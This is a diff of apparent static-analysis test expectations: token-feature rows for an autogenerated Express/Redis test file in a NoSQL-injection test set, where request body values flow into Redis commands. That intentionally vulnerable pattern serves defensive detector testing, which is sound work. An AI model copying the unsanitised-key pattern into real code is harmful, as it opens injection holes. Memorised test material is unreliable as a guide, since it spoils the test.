autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:1:1:1:1 | require | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:11 | redis | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:11 | redis | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:11 | redis | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:30 | redis | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:30 | redis | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:30 | redis | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:30 | redis = ... redis") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:30 | redis = ... redis") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:7:2:30 | redis = ... redis") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:21 | require | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:30 | exceptional return of require("redis") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:30 | exceptional return of require("redis") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:30 | exceptional return of require("redis") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:30 | require("redis") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:30 | require("redis") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:15:2:30 | require("redis") | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:23:2:29 | "redis" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:23:2:29 | "redis" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:23:2:29 | "redis" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:23:2:29 | "redis" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:23:2:29 | "redis" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:2:23:2:29 | "redis" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:12 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:12 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:12 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:12 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:35 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:35 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:35 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:35 | client ... lient() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:35 | client ... lient() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:7:3:35 | client ... lient() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:20 | redis | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:20 | redis | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:20 | redis | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:33 | redis.createClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:33 | redis.createClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:33 | redis.createClient | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:35 | exceptional return of redis.createClient() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:35 | exceptional return of redis.createClient() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:35 | exceptional return of redis.createClient() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:35 | redis.createClient() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:35 | redis.createClient() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:16:3:35 | redis.createClient() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:22:3:33 | createClient | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:22:3:33 | createClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:3:22:3:33 | createClient | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:13 | Express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:13 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:13 | Express | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:34 | Express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:34 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:34 | Express | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:34 | Express ... press') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:34 | Express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:7:5:34 | Express ... press') | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:23 | require | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:34 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:34 | exceptional return of require('express') | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:34 | require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:17:5:34 | require('express') | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:25:5:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:25:5:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:25:5:33 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:25:5:33 | 'express' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:25:5:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:5:25:5:33 | 'express' | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:9 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:9 | app | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:21 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:21 | app | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:21 | app = Express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:21 | app = Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:7:6:21 | app = Express() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:19 | Express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:19 | Express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:19 | Express | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:21 | Express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:21 | Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:21 | Express() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:21 | exceptional return of Express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:21 | exceptional return of Express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:6:13:6:21 | exceptional return of Express() | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:3 | app | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:7 | app.use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:7 | app.use | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:38 | app.use ... json()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:38 | app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:38 | app.use ... json()) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:38 | exceptional return of app.use ... json()) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:38 | exceptional return of app.use ... json()) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:1:7:38 | exceptional return of app.use ... json()) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:5:7:7 | use | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:5:7:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:5:7:7 | use | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:15 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:15 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:15 | require | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:30 | exceptional return of require ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:30 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:30 | exceptional return of require ... arser') | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:30 | require ... arser') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:30 | require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:30 | require ... arser') | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:35 | require ... ').json | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:35 | require ... ').json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:35 | require ... ').json | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:37 | exceptional return of require ... .json() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:37 | exceptional return of require ... .json() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:37 | exceptional return of require ... .json() | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:37 | require ... .json() | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:37 | require ... .json() | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:9:7:37 | require ... .json() | calleeImports | express | @@ -3944,6 +19199,24 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:17:7:29 | 'body-parser' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:17:7:29 | 'body-parser' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:17:7:29 | 'body-parser' | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:32:7:35 | json | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:32:7:35 | json | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:7:32:7:35 | json | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:9:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:9:3 | app | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:9:8 | app.post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:9:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:9:8 | app.post | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:33:2 | app.pos ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:33:2 | app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:33:2 | app.pos ... T OK\\n}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:33:2 | exceptional return of app.pos ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:33:2 | exceptional return of app.pos ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:1:33:2 | exceptional return of app.pos ... T OK\\n}) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:5:9:8 | post | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:5:9:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:5:9:8 | post | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:10:9:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:10:9:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:10:9:26 | '/documents/find' | calleeImports | express | @@ -3951,6 +19224,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:10:9:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:10:9:26 | '/documents/find' | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:10:9:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:28 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:28 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:28 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:28 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:28 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:29 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:29 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:29 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:29 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:9:29 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | 'arguments' object of anonymous function | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -3958,6 +19246,66 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | (req, r ... OT OK\\n} | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | exceptional return of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | exceptional return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | return of anonymous function | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:29:33:1 | return of anonymous function | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:30:9:32 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:35:9:37 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:35:9:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:35:9:37 | res | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:35:9:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:9:35:9:37 | res | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:10 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:14 | client.set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:14 | client.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:14 | client.set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:14 | client.set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:14 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | exceptional return of client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:5:10:37 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:12:10:14 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:12:10:14 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:12:10:14 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:12:10:14 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:12:10:14 | set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:18 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:18 | req | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:18 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:18 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:23 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:23 | req.body | contextSurroundingFunctionParameters | (req, res) | +| 